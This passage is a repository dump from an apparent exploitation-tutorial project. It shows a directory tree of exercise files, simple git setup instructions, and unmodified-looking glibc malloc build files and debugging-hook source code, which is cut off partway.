├── git.help ├── glibc ├── malloc │ ├── Depend │ ├── Makefile │ ├── Versions │ ├── arena.c │ ├── hooks.c │ ├── malloc.c │ ├── malloc.h │ ├── mallocbug.c │ ├── mcheck-init.c │ ├── mcheck.c │ ├── mcheck.h │ ├── memusage.c │ ├── memusage.sh │ ├── memusagestat.c │ ├── morecore.c │ ├── mtrace.c │ ├── mtrace.pl │ ├── obstack.c │ ├── obstack.h │ ├── set-freeres.c │ ├── tags │ ├── thread-freeres.c │ ├── tst-calloc.c │ ├── tst-malloc-usable.c │ ├── tst-malloc.c │ ├── tst-mallocfork.c │ ├── tst-mallocstate.c │ ├── tst-mallopt.c │ ├── tst-mcheck.c │ ├── tst-memalign.c │ ├── tst-mtrace.c │ ├── tst-mtrace.sh │ ├── tst-obstack.c │ ├── tst-posix_memalign.c │ ├── tst-pvalloc.c │ ├── tst-realloc.c │ ├── tst-trim1.c │ └── tst-valloc.c └── stdlib │ └── cxa_thread_atexit_impl.c ├── hof ├── hom │ ├── exp.c │ ├── malloc.c │ ├── malloc_snip.c │ └── vuln.c ├── hos │ ├── cmd │ ├── exp.c │ └── vuln.c ├── ptmalloc.ppt │ ├── comments │ │ └── cons.c │ ├── mthread │ │ └── mthread.c │ └── syscalls │ │ ├── mmap.c │ │ └── sbrk.c └── unlink │ ├── exp.c │ ├── malloc.c │ ├── malloc_free_snip.c │ ├── malloc_unlink_snip.c │ └── vuln.c ├── new ├── aslr │ ├── part1 │ │ ├── eg │ │ ├── eg.c │ │ ├── exp.py │ │ ├── vuln │ │ └── vuln.c │ ├── part2 │ │ ├── core │ │ ├── exp.py │ │ ├── vuln │ │ └── vuln.c │ └── part3 │ │ ├── core │ │ ├── exp.py │ │ ├── oexp.py │ │ ├── out │ │ ├── vuln │ │ └── vuln.c ├── csof │ ├── README │ ├── exp.py │ ├── vuln │ └── vuln.c ├── nx │ ├── cr2l │ │ ├── README │ │ ├── core │ │ ├── exp.py │ │ ├── vuln │ │ └── vuln.c │ └── r2l │ │ ├── README │ │ ├── exp.py │ │ ├── vuln │ │ ├── vuln.c │ │ ├── vuln_priv │ │ └── vuln_priv.c └── obo │ └── stack │ ├── exp.py │ ├── vuln │ └── vuln.c └── rop ├── vuln └── vuln.c /git.help: -------------------------------------------------------------------------------- 1 | Step 1: 2 | - Create a repo at https://github.com/sploitfun/ with name 'lsploits' 3 | 4 | Step 2: 5 | - Directory name should match with git repository name. 6 | 7 | $mkdir lsploits 8 | $ cd lsploits/ 9 | 10 | Step 3: 11 | - Init git repository 12 | 13 | ~/lsploits$ git init 14 | Initialized empty Git repository in /home/sploitfun/lsploits/.git/ 15 | 16 | Step 4: 17 | - Link this local git repo with github repo. 18 | 19 | ~/lsploits$ git remote add origin https://github.com/sploitfun/lsploits.git 20 | 21 | Step 5: 22 | - Add username and email address. 23 | 24 | ~/lsploits$ git config --global user.name "sploitfun" 25 | ~/lsploits$ git config --global user.email sploitfun@gmail.com 26 | Step 6: 27 | - Add your files 28 | 29 | ~/lsploits$ touch git.help 30 | 31 | Step 7: 32 | - Add local changes 33 | 34 | ~/lsploits$ git add . 35 | where '.' - Adds all the local changes. 36 | 37 | Step 8: 38 | - Commit the changes 39 | 40 | ~/lsploits$ git commit -m 'First Commit' 41 | 42 | Step 9: 43 | - Send the changes to github repo 44 | 45 | ~/lsploits$ git push origin master 46 | -------------------------------------------------------------------------------- /glibc/malloc/Depend: -------------------------------------------------------------------------------- 1 | dlfcn 2 | -------------------------------------------------------------------------------- /glibc/malloc/Makefile: -------------------------------------------------------------------------------- 1 | # Copyright (C) 1991-2014 Free Software Foundation, Inc. 2 | # This file is part of the GNU C Library. 3 | 4 | # The GNU C Library is free software; you can redistribute it and/or 5 | # modify it under the terms of the GNU Lesser General Public 6 | # License as published by the Free Software Foundation; either 7 | # version 2.1 of the License, or (at your option) any later version. 8 | 9 | # The GNU C Library is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | # Lesser General Public License for more details. 13 | 14 | # You should have received a copy of the GNU Lesser General Public 15 | # License along with the GNU C Library; if not, see 16 | # . 17 | 18 | # 19 | # Makefile for malloc routines 20 | # 21 | subdir := malloc 22 | 23 | include ../Makeconfig 24 | 25 | dist-headers := malloc.h 26 | headers := $(dist-headers) obstack.h mcheck.h 27 | tests := mallocbug tst-malloc tst-valloc tst-calloc tst-obstack \ 28 | tst-mallocstate tst-mcheck tst-mallocfork tst-trim1 \ 29 | tst-malloc-usable tst-realloc tst-posix_memalign \ 30 | tst-pvalloc tst-memalign tst-mallopt 31 | test-srcs = tst-mtrace 32 | 33 | routines = malloc morecore mcheck mtrace obstack 34 | 35 | CFLAGS-malloc.c = -g -O0 36 | CFLAGS-morecore.c = -g -O0 37 | CFLAGS-mcheck.c = -g -O0 38 | CFLAGS-mtrace.c = -g -O0 39 | CFLAGS-obstack.c = -g -O0 40 | 41 | install-lib := libmcheck.a 42 | non-lib.a := libmcheck.a 43 | 44 | # Additional library. 45 | extra-libs = libmemusage 46 | extra-libs-others = $(extra-libs) 47 | 48 | libmemusage-routines = memusage 49 | libmemusage-inhibit-o = $(filter-out .os,$(object-suffixes)) 50 | 51 | # These should be removed by `make clean'. 52 | extra-objs = mcheck-init.o libmcheck.a 53 | 54 | # Include the cleanup handler. 55 | aux := set-freeres thread-freeres 56 | 57 | CPPFLAGS-memusagestat = -DNOT_IN_libc 58 | 59 | # The Perl script to analyze the output of the mtrace functions. 60 | ifneq ($(PERL),no) 61 | install-bin-script = mtrace 62 | generated += mtrace 63 | 64 | # The Perl script will print addresses and to do this nicely we must know 65 | # whether we are on a 32 or 64 bit machine. 66 | ifneq ($(findstring wordsize-32,$(config-sysdirs)),) 67 | address-width=10 68 | else 69 | address-width=18 70 | endif 71 | endif 72 | 73 | # Unless we get a test for the availability of libgd which also works 74 | # for cross-compiling we disable the memusagestat generation in this 75 | # situation. 76 | ifneq ($(cross-compiling),yes) 77 | # If the gd library is available we build the `memusagestat' program. 78 | ifneq ($(LIBGD),no) 79 | others: $(objpfx)memusage 80 | install-bin = memusagestat 81 | install-bin-script += memusage 82 | generated += memusagestat memusage 83 | extra-objs += memusagestat.o 84 | 85 | # The configure.ac check for libgd and its headers did not use $SYSINCLUDES. 86 | # The directory specified by --with-headers usually contains only the basic 87 | # kernel interface headers, not something like libgd. So the simplest thing 88 | # is to presume that the standard system headers will be ok for this file. 89 | $(objpfx)memusagestat.o: sysincludes = # nothing 90 | endif 91 | endif 92 | 93 | # Another goal which can be used to override the configure decision. 94 | .PHONY: do-memusagestat 95 | do-memusagestat: $(objpfx)memusagestat 96 | 97 | memusagestat-modules = memusagestat 98 | $(objpfx)memusagestat: $(memusagestat-modules:%=$(objpfx)%.o) 99 | $(LINK.o) -o $@ $^ $(libgd-LDFLAGS) -lgd -lpng -lz -lm 100 | 101 | ifeq ($(run-built-tests),yes) 102 | ifeq (yes,$(build-shared)) 103 | ifneq ($(PERL),no) 104 | tests-special += $(objpfx)tst-mtrace.out 105 | endif 106 | endif 107 | endif 108 | 109 | include ../Rules 110 | 111 | CFLAGS-mcheck-init.c = $(PIC-ccflag) 112 | CFLAGS-obstack.c = $(uses-callbacks) 113 | 114 | $(objpfx)libmcheck.a: $(objpfx)mcheck-init.o 115 | -rm -f $@ 116 | $(patsubst %/,cd % &&,$(objpfx)) \ 117 | $(LN_S) $( $@.new \ 146 | && rm -f $@ && mv $@.new $@ && chmod +x $@ 147 | 148 | $(objpfx)memusage: memusage.sh 149 | rm -f $@.new 150 | sed -e 's|@BASH@|$(BASH)|' -e 's|@VERSION@|$(version)|' \ 151 | -e 's|@SLIBDIR@|$(sLIBdir)|' -e 's|@BINDIR@|$(bindir)|' \ 152 | -e 's|@PKGVERSION@|$(PKGVERSION)|' \ 153 | -e 's|@REPORT_BUGS_TO@|$(REPORT_BUGS_TO)|' $^ > $@.new \ 154 | && rm -f $@ && mv $@.new $@ && chmod +x $@ 155 | 156 | 157 | # The implementation uses `dlsym' 158 | $(objpfx)libmemusage.so: $(libdl) 159 | 160 | # Extra dependencies 161 | $(foreach o,$(all-object-suffixes),$(objpfx)malloc$(o)): arena.c hooks.c 162 | -------------------------------------------------------------------------------- /glibc/malloc/Versions: -------------------------------------------------------------------------------- 1 | libc { 2 | GLIBC_2.0 { 3 | # global variables 4 | _obstack; 5 | 6 | # interface of malloc functions 7 | __libc_calloc; __libc_free; __libc_mallinfo; __libc_malloc; 8 | __libc_mallopt; __libc_memalign; __libc_pvalloc; __libc_realloc; 9 | __libc_valloc; 10 | __malloc_initialize_hook; __free_hook; __malloc_hook; __realloc_hook; 11 | __memalign_hook; __after_morecore_hook; 12 | __malloc_initialized; __default_morecore; __morecore; 13 | 14 | # functions used in inline functions or macros 15 | _obstack_allocated_p; _obstack_begin; _obstack_begin_1; 16 | _obstack_free; _obstack_memory_used; _obstack_newchunk; 17 | 18 | # variables in normal name space 19 | mallwatch; obstack_alloc_failed_handler; obstack_exit_failure; 20 | 21 | # c* 22 | calloc; cfree; 23 | 24 | # f* 25 | free; 26 | 27 | # m* 28 | mallinfo; malloc; malloc_get_state; malloc_set_state; malloc_stats; 29 | malloc_trim; malloc_usable_size; mallopt; memalign; mprobe; mtrace; 30 | muntrace; 31 | 32 | # o* 33 | obstack_free; 34 | 35 | # p* 36 | pvalloc; 37 | 38 | # r* 39 | realloc; 40 | 41 | # t* 42 | tr_break; 43 | 44 | # v* 45 | valloc; 46 | } 47 | GLIBC_2.1 { 48 | # Special functions. 49 | __libc_freeres; 50 | } 51 | GLIBC_2.2 { 52 | # m* 53 | mcheck_check_all; mcheck_pedantic; 54 | 55 | # p* 56 | posix_memalign; 57 | } 58 | GLIBC_2.10 { 59 | malloc_info; 60 | } 61 | GLIBC_2.16 { 62 | aligned_alloc; 63 | } 64 | GLIBC_PRIVATE { 65 | # Internal startup hook for libpthread. 66 | __libc_malloc_pthread_startup; 67 | 68 | # Internal destructor hook for libpthread. 69 | __libc_thread_freeres; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /glibc/malloc/hooks.c: -------------------------------------------------------------------------------- 1 | /* Malloc implementation for multiple threads without lock contention. 2 | Copyright (C) 2001-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | Contributed by Wolfram Gloger , 2001. 5 | 6 | The GNU C Library is free software; you can redistribute it and/or 7 | modify it under the terms of the GNU Lesser General Public License as 8 | published by the Free Software Foundation; either version 2.1 of the 9 | License, or (at your option) any later version. 10 | 11 | The GNU C Library is distributed in the hope that it will be useful, 12 | but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 14 | Lesser General Public License for more details. 15 | 16 | You should have received a copy of the GNU Lesser General Public 17 | License along with the GNU C Library; see the file COPYING.LIB. If 18 | not, see . */ 19 | 20 | /* What to do if the standard debugging hooks are in place and a 21 | corrupt pointer is detected: do nothing (0), print an error message 22 | (1), or call abort() (2). */ 23 | 24 | /* Hooks for debugging versions. The initial hooks just call the 25 | initialization routine, then do the normal work. */ 26 | 27 | static void * 28 | malloc_hook_ini (size_t sz, const void *caller) 29 | { 30 | __malloc_hook = NULL; 31 | ptmalloc_init (); 32 | return __libc_malloc (sz); 33 | } 34 | 35 | static void * 36 | realloc_hook_ini (void *ptr, size_t sz, const void *caller) 37 | { 38 | __malloc_hook = NULL; 39 | __realloc_hook = NULL; 40 | ptmalloc_init (); 41 | return __libc_realloc (ptr, sz); 42 | } 43 | 44 | static void * 45 | memalign_hook_ini (size_t alignment, size_t sz, const void *caller) 46 | { 47 | __memalign_hook = NULL; 48 | ptmalloc_init (); 49 | return __libc_memalign (alignment, sz); 50 | } 51 | 52 | /* Whether we are using malloc checking. */ 53 | static int using_malloc_checking; 54 | 55 | /* A flag that is set by malloc_set_state, to signal that malloc checking 56 | must not be enabled on the request from the user (via the MALLOC_CHECK_ 57 | environment variable). It is reset by __malloc_check_init to tell 58 | malloc_set_state that the user has requested malloc checking. 59 | 60 | The purpose of this flag is to make sure that malloc checking is not 61 | enabled when the heap to be restored was constructed without malloc 62 | checking, and thus does not contain the required magic bytes. 63 | Otherwise the heap would be corrupted by calls to free and realloc. If 64 | it turns out that the heap was created with malloc checking and the 65 | user has requested it malloc_set_state just calls __malloc_check_init 66 | again to enable it. On the other hand, reusing such a heap without 67 | further malloc checking is safe. */ 68 | static int disallow_malloc_check; 69 | 70 | /* Activate a standard set of debugging hooks. */ 71 | void 72 | __malloc_check_init (void) 73 | { 74 | if (disallow_malloc_check) 75 | { 76 | disallow_malloc_check = 0; 77 | return; 78 | } 79 | using_malloc_checking = 1; 80 | __malloc_hook = malloc_check; 81 | __free_hook = free_check; 82 | __realloc_hook = realloc_check; 83 | __memalign_hook = memalign_check; 84 | } 85 | 86 | /* A simple, standard set of debugging hooks. Overhead is `only' one 87 | byte per chunk; still this will catch most cases of double frees or 88 | overruns. The goal here is to avoid obscure crashes due to invalid 89 | usage, unlike in the MALLOC_DEBUG code. */ 90 | 91 | #define MAGICBYTE(p) ((((size_t) p >> 3) ^ ((size_t) p >> 11)) & 0xFF) 92 | 93 | /* Visualize the chunk as being partitioned into blocks of 256 bytes from the 94 | highest address of the chunk, downwards. The beginning of each block tells 95 | us the size of the previous block, up to the actual size of the requested 96 | memory. Our magic byte is right at the end of the requested size, so we 97 | must reach it with this iteration, otherwise we have witnessed a memory 98 | corruption. */ 99 | static size_t 100 | malloc_check_get_size (mchunkptr p) 101 | { 102 | size_t size; 103 | unsigned char c; 104 | unsigned char magic = MAGICBYTE (p); 105 | 106 | assert (using_malloc_checking == 1); 107 | 108 | for (size = chunksize (p) - 1 + (chunk_is_mmapped (p) ? 0 : SIZE_SZ); 109 | (c = ((unsigned char *) p)[size]) != magic; 110 | size -= c) 111 | { 112 | if (c <= 0 || size < (c + 2 * SIZE_SZ)) 113 | { 114 | malloc_printerr (check_action, "malloc_check_get_size: memory corruption", 115 | chunk2mem (p)); 116 | return 0; 117 | } 118 | } 119 | 120 | /* chunk2mem size. */ 121 | return size - 2 * SIZE_SZ; 122 | } 123 | 124 | /* Instrument a chunk with overrun detector byte(s) and convert it 125 | into a user pointer with requested size sz. */ 126 | 127 | static void * 128 | internal_function 129 | mem2mem_check (void *ptr, size_t sz) 130 | { 131 | mchunkptr p; 132 | unsigned char *m_ptr = ptr; 133 | size_t i; 134 | 135 | if (!ptr) 136 | return ptr; 137 | 138 | p = mem2chunk (ptr); 139 | for (i = chunksize (p) - (chunk_is_mmapped (p) ? 2 * SIZE_SZ + 1 : SIZE_SZ + 1); 140 | i > sz; 141 | i -= 0xFF) 142 | { 143 | if (i - sz < 0x100) 144 | { 145 | m_ptr[i] = (unsigned char) (i - sz); 146 | break; 147 | } 148 | m_ptr[i] = 0xFF; 149 | } 150 | m_ptr[sz] = MAGICBYTE (p); 151 | return (void *) m_ptr; 152 | } 153 | 154 | /* Convert a pointer to be free()d or realloc()ed to a valid chunk 155 | pointer. If the provided pointer is not valid, return NULL. */ 156 | 157 | static mchunkptr 158 | internal_function 159 | mem2chunk_check (void *mem, unsigned char **magic_p) 160 | { 161 | mchunkptr p; 162 | INTERNAL_SIZE_T sz, c; 163 | unsigned char magic; 164 | 165 | if (!aligned_OK (mem)) 166 | return NULL; 167 | 168 | p = mem2chunk (mem); 169 | if (!chunk_is_mmapped (p)) 170 | { 171 | /* Must be a chunk in conventional heap memory. */ 172 | int contig = contiguous (&main_arena); 173 | sz = chunksize (p); 174 | if ((contig && 175 | ((char *) p < mp_.sbrk_base || 176 | ((char *) p + sz) >= (mp_.sbrk_base + main_arena.system_mem))) || 177 | sz < MINSIZE || sz & MALLOC_ALIGN_MASK || !inuse (p) || 178 | (!prev_inuse (p) && (p->prev_size & MALLOC_ALIGN_MASK || 179 | (contig && (char *) prev_chunk (p) < mp_.sbrk_base) || 180 | next_chunk (prev_chunk (p)) != p))) 181 | return NULL; 182 | 183 | magic = MAGICBYTE (p); 184 | for (sz += SIZE_SZ - 1; (c = ((unsigned char *) p)[sz]) != magic; sz -= c) 185 | { 186 | if (c <= 0 || sz < (c + 2 * SIZE_SZ)) 187 | return NULL; 188 | } 189 | } 190 | else 191 | { 192 | unsigned long offset, page_mask = GLRO (dl_pagesize) - 1; 193 | 194 | /* mmap()ed chunks have MALLOC_ALIGNMENT or higher power-of-two 195 | alignment relative to the beginning of a page. Check this 196 | first. */ 197 | offset = (unsigned long) mem & page_mask; 198 | if ((offset != MALLOC_ALIGNMENT && offset != 0 && offset != 0x10 && 199 | offset != 0x20 && offset != 0x40 && offset != 0x80 && offset != 0x100 && 200 | offset != 0x200 && offset != 0x400 && offset != 0x800 && offset != 0x1000 && 201 | offset < 0x2000) || 202 | !chunk_is_mmapped (p) || (p->size & PREV_INUSE) || 203 | ((((unsigned long) p - p->prev_size) & page_mask) != 0) || 204 | ((sz = chunksize (p)), ((p->prev_size + sz) & page_mask) != 0)) 205 | return NULL; 206 | 207 | magic = MAGICBYTE (p); 208 | for (sz -= 1; (c = ((unsigned char *) p)[sz]) != magic; sz -= c) 209 | { 210 | if (c <= 0 || sz < (c + 2 * SIZE_SZ)) 211 | return NULL; 212 | } 213 | } 214 | ((unsigned char *) p)[sz] ^= 0xFF; 215 | if (magic_p) 216 | *magic_p = (unsigned char *) p + sz; 217 | return p; 218 | } 219 | 220 | /* Check for corruption of the top chunk, and try to recover if 221 | necessary. */ 222 | 223 | static int 224 | internal_function 225 | top_check (void) 226 | { 227 | mchunkptr t = top (&main_arena); 228 | char *brk, *new_brk; 229 | INTERNAL_SIZE_T front_misalign, sbrk_size; 230 | unsigned long pagesz = GLRO (dl_pagesize); 231 | 232 | if (t == initial_top (&main_arena) || 233 | (!chunk_is_mmapped (t) && 234 | chunksize (t) >= MINSIZE && 235 | prev_inuse (t) && 236 | (!contiguous (&main_arena) || 237 | (char *) t + chunksize (t) == mp_.sbrk_base + main_arena.system_mem))) 238 | return 0; 239 | 240 | malloc_printerr (check_action, "malloc: top chunk is corrupt", t); 241 | 242 | /* Try to set up a new top chunk. */ 243 | brk = MORECORE (0); 244 | front_misalign = (unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK; 245 | if (front_misalign > 0) 246 | front_misalign = MALLOC_ALIGNMENT - front_misalign; 247 | sbrk_size = front_misalign + mp_.top_pad + MINSIZE; 248 | sbrk_size += pagesz - ((unsigned long) (brk + sbrk_size) & (pagesz - 1)); 249 | new_brk = (char *) (MORECORE (sbrk_size)); 250 | if (new_brk == (char *) (MORECORE_FAILURE)) 251 | { 252 | __set_errno (ENOMEM); 253 | return -1; 254 | } 255 | /* Call the `morecore' hook if necessary. */ 256 | void (*hook) (void) = atomic_forced_read (__after_morecore_hook); 257 | if (hook) 258 | (*hook)(); 259 | main_arena.system_mem = (new_brk - mp_.sbrk_base) + sbrk_size; 260 | 261 | top (&main_arena) = (mchunkptr) (brk + front_misalign); 262 | set_head (top (&main_arena), (sbrk_size - front_misalign) | PREV_INUSE); 263 | 264 | return 0; 265 | } 266 | 267 | static void * 268 | malloc_check (size_t sz, const void *caller) 269 | { 270 | void *victim; 271 | 272 | if (sz + 1 == 0) 273 | { 274 | __set_errno (ENOMEM); 275 | return NULL; 276 | } 277 | 278 | (void) mutex_lock (&main_arena.mutex); 279 | victim = (top_check () >= 0) ? _int_malloc (&main_arena, sz + 1) : NULL; 280 | (void) mutex_unlock (&main_arena.mutex); 281 | return mem2mem_check (victim, sz); 282 | } 283 | 284 | static void 285 | free_check (void *mem, const void *caller) 286 | { 287 | mchunkptr p; 288 | 289 | if (!mem) 290 | return; 291 | 292 | (void) mutex_lock (&main_arena.mutex); 293 | p = mem2chunk_check (mem, NULL); 294 | if (!p) 295 | { 296 | (void) mutex_unlock (&main_arena.mutex); 297 | 298 | malloc_printerr (check_action, "free(): invalid pointer", mem); 299 | return; 300 | } 301 | if (chunk_is_mmapped (p)) 302 | { 303 | (void) mutex_unlock (&main_arena.mutex); 304 | munmap_chunk (p); 305 | return; 306 | } 307 | _int_free (&main_arena, p, 1); 308 | (void) mutex_unlock (&main_arena.mutex); 309 | } 310 | 311 | static void * 312 | realloc_check (void *oldmem, size_t bytes, const void *caller) 313 | { 314 | INTERNAL_SIZE_T nb; 315 | void *newmem = 0; 316 | unsigned char *magic_p; 317 | 318 | if (bytes + 1 == 0) 319 | { 320 | __set_errno (ENOMEM); 321 | return NULL; 322 | } 323 | if (oldmem == 0) 324 | return malloc_check (bytes, NULL); 325 | 326 | if (bytes == 0) 327 | { 328 | free_check (oldmem, NULL); 329 | return NULL; 330 | } 331 | (void) mutex_lock (&main_arena.mutex); 332 | const mchunkptr oldp = mem2chunk_check (oldmem, &magic_p); 333 | (void) mutex_unlock (&main_arena.mutex); 334 | if (!oldp) 335 | { 336 | malloc_printerr (check_action, "realloc(): invalid pointer", oldmem); 337 | return malloc_check (bytes, NULL); 338 | } 339 | const INTERNAL_SIZE_T oldsize = chunksize (oldp); 340 | 341 | checked_request2size (bytes + 1, nb); 342 | (void) mutex_lock (&main_arena.mutex); 343 | 344 | if (chunk_is_mmapped (oldp)) 345 | { 346 | #if HAVE_MREMAP 347 | mchunkptr newp = mremap_chunk (oldp, nb); 348 | if (newp) 349 | newmem = chunk2mem (newp); 350 | else 351 | #endif 352 | { 353 | /* Note the extra SIZE_SZ overhead. */ 354 | if (oldsize - SIZE_SZ >= nb) 355 | newmem = oldmem; /* do nothing */ 356 | else 357 | { 358 | /* Must alloc, copy, free. */ 359 | if (top_check () >= 0) 360 | newmem = _int_malloc (&main_arena, bytes + 1); 361 | if (newmem) 362 | { 363 | memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ); 364 | munmap_chunk (oldp); 365 | } 366 | } 367 | } 368 | } 369 | else 370 | { 371 | if (top_check () >= 0) 372 | { 373 | INTERNAL_SIZE_T nb; 374 | checked_request2size (bytes + 1, nb); 375 | newmem = _int_realloc (&main_arena, oldp, oldsize, nb); 376 | } 377 | } 378 | 379 | /* mem2chunk_check changed the magic byte in the old chunk. 380 | If newmem is NULL, then the old chunk will still be used though, 381 | so we need to invert that change here. */ 382 | if (newmem == NULL) 383 | *magic_p ^= 0xFF; 384 | 385 | (void) mutex_unlock (&main_arena.mutex); 386 | 387 | return mem2mem_check (newmem, bytes); 388 | } 389 | 390 | static void * 391 | memalign_check (size_t alignment, size_t bytes, const void *caller) 392 | { 393 | void *mem; 394 | 395 | if (alignment <= MALLOC_ALIGNMENT) 396 | return malloc_check (bytes, NULL); 397 | 398 | if (alignment < MINSIZE) 399 | alignment = MINSIZE; 400 | 401 | /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a 402 | power of 2 and will cause overflow in the check below. */ 403 | if (alignment > SIZE_MAX / 2 + 1) 404 | { 405 | __set_errno (EINVAL); 406 | return 0; 407 | } 408 | 409 | /* Check for overflow. */ 410 | if (bytes > SIZE_MAX - alignment - MINSIZE) 411 | { 412 | __set_errno (ENOMEM); 413 | return 0; 414 | } 415 | 416 | /* Make sure alignment is power of 2. */ 417 | if (!powerof2 (alignment)) 418 | { 419 | size_t a = MALLOC_ALIGNMENT * 2; 420 | while (a < alignment) 421 | a <<= 1; 422 | alignment = a; 423 | } 424 | 425 | (void) mutex_lock (&main_arena.mutex); 426 | mem = (top_check () >= 0) ? _int_memalign (&main_arena, alignment, bytes + 1) : 427 | NULL; 428 | (void) mutex_unlock (&main_arena.mutex); 429 | return mem2mem_check (mem, bytes); 430 | } 431 | 432 | 433 | /* Get/set state: malloc_get_state() records the current state of all 434 | malloc variables (_except_ for the actual heap contents and `hook' 435 | function pointers) in a system dependent, opaque data structure. 436 | This data structure is dynamically allocated and can be free()d 437 | after use. malloc_set_state() restores the state of all malloc 438 | variables to the previously obtained state. This is especially 439 | useful when using this malloc as part of a shared library, and when 440 | the heap contents are saved/restored via some other method. The 441 | primary example for this is GNU Emacs with its `dumping' procedure. 442 | `Hook' function pointers are never saved or restored by these 443 | functions, with two exceptions: If malloc checking was in use when 444 | malloc_get_state() was called, then malloc_set_state() calls 445 | __malloc_check_init() if possible; if malloc checking was not in 446 | use in the recorded state but the user requested malloc checking, 447 | then the hooks are reset to 0. */ 448 | 449 | #define MALLOC_STATE_MAGIC 0x444c4541l 450 | #define MALLOC_STATE_VERSION (0 * 0x100l + 4l) /* major*0x100 + minor */ 451 | 452 | struct malloc_save_state 453 | { 454 | long magic; 455 | long version; 456 | mbinptr av[NBINS * 2 + 2]; 457 | char *sbrk_base; 458 | int sbrked_mem_bytes; 459 | unsigned long trim_threshold; 460 | unsigned long top_pad; 461 | unsigned int n_mmaps_max; 462 | unsigned long mmap_threshold; 463 | int check_action; 464 | unsigned long max_sbrked_mem; 465 | unsigned long max_total_mem; 466 | unsigned int n_mmaps; 467 | unsigned int max_n_mmaps; 468 | unsigned long mmapped_mem; 469 | unsigned long max_mmapped_mem; 470 | int using_malloc_checking; 471 | unsigned long max_fast; 472 | unsigned long arena_test; 473 | unsigned long arena_max; 474 | unsigned long narenas; 475 | }; 476 | 477 | void * 478 | __malloc_get_state (void) 479 | { 480 | struct malloc_save_state *ms; 481 | int i; 482 | mbinptr b; 483 | 484 | ms = (struct malloc_save_state *) __libc_malloc (sizeof (*ms)); 485 | if (!ms) 486 | return 0; 487 | 488 | (void) mutex_lock (&main_arena.mutex); 489 | malloc_consolidate (&main_arena); 490 | ms->magic = MALLOC_STATE_MAGIC; 491 | ms->version = MALLOC_STATE_VERSION; 492 | ms->av[0] = 0; 493 | ms->av[1] = 0; /* used to be binblocks, now no longer used */ 494 | ms->av[2] = top (&main_arena); 495 | ms->av[3] = 0; /* used to be undefined */ 496 | for (i = 1; i < NBINS; i++) 497 | { 498 | b = bin_at (&main_arena, i); 499 | if (first (b) == b) 500 | ms->av[2 * i + 2] = ms->av[2 * i + 3] = 0; /* empty bin */ 501 | else 502 | { 503 | ms->av[2 * i + 2] = first (b); 504 | ms->av[2 * i + 3] = last (b); 505 | } 506 | } 507 | ms->sbrk_base = mp_.sbrk_base; 508 | ms->sbrked_mem_bytes = main_arena.system_mem; 509 | ms->trim_threshold = mp_.trim_threshold; 510 | ms->top_pad = mp_.top_pad; 511 | ms->n_mmaps_max = mp_.n_mmaps_max; 512 | ms->mmap_threshold = mp_.mmap_threshold; 513 | ms->check_action = check_action; 514 | ms->max_sbrked_mem = main_arena.max_system_mem; 515 | ms->max_total_mem = 0; 516 | ms->n_mmaps = mp_.n_mmaps; 517 | ms->max_n_mmaps = mp_.max_n_mmaps; 518 | ms->mmapped_mem = mp_.mmapped_mem; 519 | ms->max_mmapped_mem = mp_.max_mmapped_mem; 520 | ms->using_malloc_checking = using_malloc_checking; 521 | ms->max_fast = get_max_fast (); 522 | ms->arena_test = mp_.arena_test; 523 | ms->arena_max = mp_.arena_max; 524 | ms->narenas = narenas; 525 | (void) mutex_unlock (&main_arena.mutex); 526 | return (void *) ms; 527 | } 528 | 529 | int 530 | __malloc_set_state (void *msptr) 531 | { 532 | struct malloc_save_state *ms = (struct malloc_save_state *) msptr; 533 | size_t i; 534 | mbinptr b; 535 | 536 | disallow_malloc_check = 1; 537 | ptmalloc_init (); 538 | if (ms->magic != MALLOC_STATE_MAGIC) 539 | return -1; 540 | 541 | /* Must fail if the major version is too high. */ 542 | if ((ms->version & ~0xffl) > (MALLOC_STATE_VERSION & ~0xffl)) 543 | return -2; 544 | 545 | (void) mutex_lock (&main_arena.mutex); 546 | /* There are no fastchunks. */ 547 | clear_fastchunks (&main_arena); 548 | if (ms->version >= 4) 549 | set_max_fast (ms->max_fast); 550 | else 551 | set_max_fast (64); /* 64 used to be the value we always used. */ 552 | for (i = 0; i < NFASTBINS; ++i) 553 | fastbin (&main_arena, i) = 0; 554 | for (i = 0; i < BINMAPSIZE; ++i) 555 | main_arena.binmap[i] = 0; 556 | top (&main_arena) = ms->av[2]; 557 | main_arena.last_remainder = 0; 558 | for (i = 1; i < NBINS; i++) 559 | { 560 | b = bin_at (&main_arena, i); 561 | if (ms->av[2 * i + 2] == 0) 562 | { 563 | assert (ms->av[2 * i + 3] == 0); 564 | first (b) = last (b) = b; 565 | } 566 | else 567 | { 568 | if (ms->version >= 3 && 569 | (i < NSMALLBINS || (largebin_index (chunksize (ms->av[2 * i + 2])) == i && 570 | largebin_index (chunksize (ms->av[2 * i + 3])) == i))) 571 | { 572 | first (b) = ms->av[2 * i + 2]; 573 | last (b) = ms->av[2 * i + 3]; 574 | /* Make sure the links to the bins within the heap are correct. */ 575 | first (b)->bk = b; 576 | last (b)->fd = b; 577 | /* Set bit in binblocks. */ 578 | mark_bin (&main_arena, i); 579 | } 580 | else 581 | { 582 | /* Oops, index computation from chunksize must have changed. 583 | Link the whole list into unsorted_chunks. */ 584 | first (b) = last (b) = b; 585 | b = unsorted_chunks (&main_arena); 586 | ms->av[2 * i + 2]->bk = b; 587 | ms->av[2 * i + 3]->fd = b->fd; 588 | b->fd->bk = ms->av[2 * i + 3]; 589 | b->fd = ms->av[2 * i + 2]; 590 | } 591 | } 592 | } 593 | if (ms->version < 3) 594 | { 595 | /* Clear fd_nextsize and bk_nextsize fields. */ 596 | b = unsorted_chunks (&main_arena)->fd; 597 | while (b != unsorted_chunks (&main_arena)) 598 | { 599 | if (!in_smallbin_range (chunksize (b))) 600 | { 601 | b->fd_nextsize = NULL; 602 | b->bk_nextsize = NULL; 603 | } 604 | b = b->fd; 605 | } 606 | } 607 | mp_.sbrk_base = ms->sbrk_base; 608 | main_arena.system_mem = ms->sbrked_mem_bytes; 609 | mp_.trim_threshold = ms->trim_threshold; 610 | mp_.top_pad = ms->top_pad; 611 | 